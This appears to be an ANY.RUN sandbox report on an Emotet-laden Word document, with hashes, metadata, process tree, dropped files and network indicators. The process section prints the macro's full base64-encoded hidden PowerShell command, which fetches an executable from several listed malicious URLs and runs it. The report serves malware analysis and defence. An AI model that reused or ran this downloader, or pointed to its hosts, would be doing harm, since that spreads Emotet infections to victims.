analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

iibea-032709148-341719111-6r6auusna-6j9m

Full analysis: https://app.any.run/tasks/ac36e52d-70f8-44e8-9c25-56b815f237d2
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 18:51:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
opendir
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Et dicta voluptates., Author: Matthias Lammert, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 6 16:28:00 2019, Last Saved Time/Date: Fri Dec 6 16:28:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 336, Security: 0
MD5:

60D1AB55D06ACA1A28FD8A44FB99FB35

SHA1:

9C8ECD0BCCBAE26BA4F4F2B7053A429E120FD5D3

SHA256:

9D14B7C21A7AA2D4B462A90C46EC3FE1FF7C9C1C7564AEDD5A7EF3BD32D9EC1D

SSDEEP:

6144:R7AtOKO+FT7qB2k4etGiL3HJkEyD7bGRDvys0De7:R7AtOKO+FT7qB3Qitk/7bGRZ0De7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3124)
    • Creates files in the user directory

      • powershell.exe (PID: 3124)
    • PowerShell script executed

      • powershell.exe (PID: 3124)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1956)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1956)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Et dicta voluptates.
Subject: -
Author: Matthias Lammert
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:12:06 16:28:00
ModifyDate: 2019:12:06 16:28:00
Pages: 1
Words: 58
Characters: 336
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 2
Paragraphs: 1
CharCountWithSpaces: 393
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1956"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\iibea-032709148-341719111-6r6auusna-6j9m.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3124powershell -w hidden -en JABYAGgAZABlAGQAYQBiAHoAbgB1AGEAYQA9ACcAVwB4AGcAaQBiAHcAYwBuAHgAdwAnADsAJABLAHkAcgB1AGIAdQBxAGsAbgB0ACAAPQAgACcANAA3ACcAOwAkAEoAYgByAGYAaABuAGwAcwBnAGcAbAByAD0AJwBZAHYAcQB4AHIAeQBzAHkAdABkAGYAJwA7ACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAeQByAHUAYgB1AHEAawBuAHQAKwAnAC4AZQB4AGUAJwA7ACQATwBrAGsAaABkAG8AZgByAHkAdgA9ACcATQBrAHEAcQBxAHUAcQBuAGoAZQBzAGcAJwA7ACQAWQB5AGEAbQBzAGEAZQB4AGcAcQBpAD0AJgAoACcAbgAnACsAJwBlACcAKwAnAHcALQBvAGIAagBlAGMAdAAnACkAIABOAGUAVAAuAFcAZQBiAEMATABpAEUATgB0ADsAJABVAHAAeQB4AG0AdgBmAHMAcABuAGIAdQA9ACcAaAB0AHQAcAA6AC8ALwByAG0AYwBlAG4AdAByAGUALgBiAGkAZwBmAGkAbABtAHAAcgBvAGQAdQBjAHQAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEwAcgBPAHEAaAAvACoAaAB0AHQAcAA6AC8ALwBsAGUAYwBhAGQAZQBhAHUAZwBvAHUAcgBtAGEAbgBkAC4AZgByAC8ANAA3AG0AbgAwADQALwBvAFMAOABEAGsAVgAvACoAaAB0AHQAcAA6AC8ALwBkAGEAdABuAGUAbgB0AGEAeQBoAGEAbgBvAGkALgBpAG4AZgBvAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcAB5AFoAcgBkAGQAZwAvACoAaAB0AHQAcAA6AC8ALwBiAGkAZQB0AHQAaAB1AHYAaQBuAGgAbwBtAGUAcwBnAGkAYQBsAGEAbQAuAHgAeQB6AC8AYwBnAGkALQBiAGkAbgAvAGEAYwBCADQAcQA0AHkALwAqAGgAdAB0AHAAOgAvAC8AYwBsAGkAYwBrAGIAYQBuAGsAYgByAGUAYQBrAHMAdABoAGUAaQBuAHQAZQByAG4AZQB0AC4AYwBvAG0ALwBvAEEANgBlAG4ASQA4AC8AJwAuACIAUwBwAGAATABJAHQAIgAoACcAKgAnACkAOwAkAFEAYwBsAGkAbwBhAHAAZQB3AGkAPQAnAEkAZABoAHYAYQB6AGEAZQBmAG4AYgBoAGMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEsAaAB3AGQAbwBsAGEAdwBoAHUAcwBqAHYAIABpAG4AIAAkAFUAcAB5AHgAbQB2AGYAcwBwAG4AYgB1ACkAewB0AHIAeQB7ACQAWQB5AGEAbQBzAGEAZQB4AGcAcQBpAC4AIgBEAG8AYAB3AG4AYABsAE8AYABBAEQAZgBpAEwARQAiACgAJABLAGgAdwBkAG8AbABhAHcAaAB1AHMAagB2ACwAIAAkAEIAcwBhAHQAYwBxAG4AagBwAHYAbgBvACkAOwAkAEUAegBrAHIAZABpAHQAeABkAGcAcQA9ACcARQBoAG8AaQB1AHMAbQBuAGYAbgBkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8AKQAuACIAbABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADQANwAxADYAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAHQAIgAoACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8AKQA7ACQARQBkAGEAZABmAGYAbABrAGYAbABxAHMAPQAnAEYAZQBwAGoAcgBsAHoAeAB5AHQAbQAnADsAYgByAGUAYQBrADsAJABCAHkAbABnAHkAeABuAHAAdABjAGMAbABjAD0AJwBDAGQAcgBjAGMAeABoAGIAeQB1AGIAdQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAGgAcgB1AGoAagBtAHQAZQA9ACcAQwB6AGwAYwBuAHkAcABoAGYAdQB2AGIAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 735
Read events
1 904
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
9

Dropped files

PID
Process
Filename
Type
1956WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA67B.tmp.cvr
MD5:
SHA256:
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEA95C9A.wmf
MD5:
SHA256:
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74890FD3.wmf
MD5:
SHA256:
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\12DEDFB8.wmf
MD5:
SHA256:
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9B6CAC59.wmf
MD5:
SHA256:
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E13686.wmf
MD5:
SHA256:
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B3F28CF.wmf
MD5:
SHA256:
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C8AE8C84.wmf
MD5:
SHA256:
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75BDBAB5.wmf
MD5:
SHA256:
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CEB39932.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3124
powershell.exe
GET
404
94.237.77.152:80
http://datnentayhanoi.info/wp-includes/pyZrddg/
FI
xml
345 b
suspicious
3124
powershell.exe
GET
404
206.221.182.74:80
http://rmcentre.bigfilmproduction.com/wp-includes/LrOqh/
US
xml
345 b
malicious
3124
powershell.exe
GET
404
87.98.154.146:80
http://lecadeaugourmand.fr/47mn04/oS8DkV/
FR
xml
345 b
malicious
3124
powershell.exe
GET
404
104.27.154.90:80
http://clickbankbreakstheinternet.com/oA6enI8/
US
xml
345 b
malicious
3124
powershell.exe
GET
404
94.237.77.152:80
http://bietthuvinhomesgialam.xyz/cgi-bin/acB4q4y/
FI
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3124
powershell.exe
94.237.77.152:80
datnentayhanoi.info
FI
suspicious
3124
powershell.exe
206.221.182.74:80
rmcentre.bigfilmproduction.com
Choopa, LLC
US
malicious
3124
powershell.exe
87.98.154.146:80
lecadeaugourmand.fr
OVH SAS
FR
malicious
3124
powershell.exe
104.27.154.90:80
clickbankbreakstheinternet.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
rmcentre.bigfilmproduction.com
  • 206.221.182.74
malicious
lecadeaugourmand.fr
  • 87.98.154.146
malicious
datnentayhanoi.info
  • 94.237.77.152
suspicious
bietthuvinhomesgialam.xyz
  • 94.237.77.152
suspicious
clickbankbreakstheinternet.com
  • 104.27.154.90
  • 104.27.155.90
malicious

Threats

PID
Process
Class
Message
3124
powershell.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
No debug info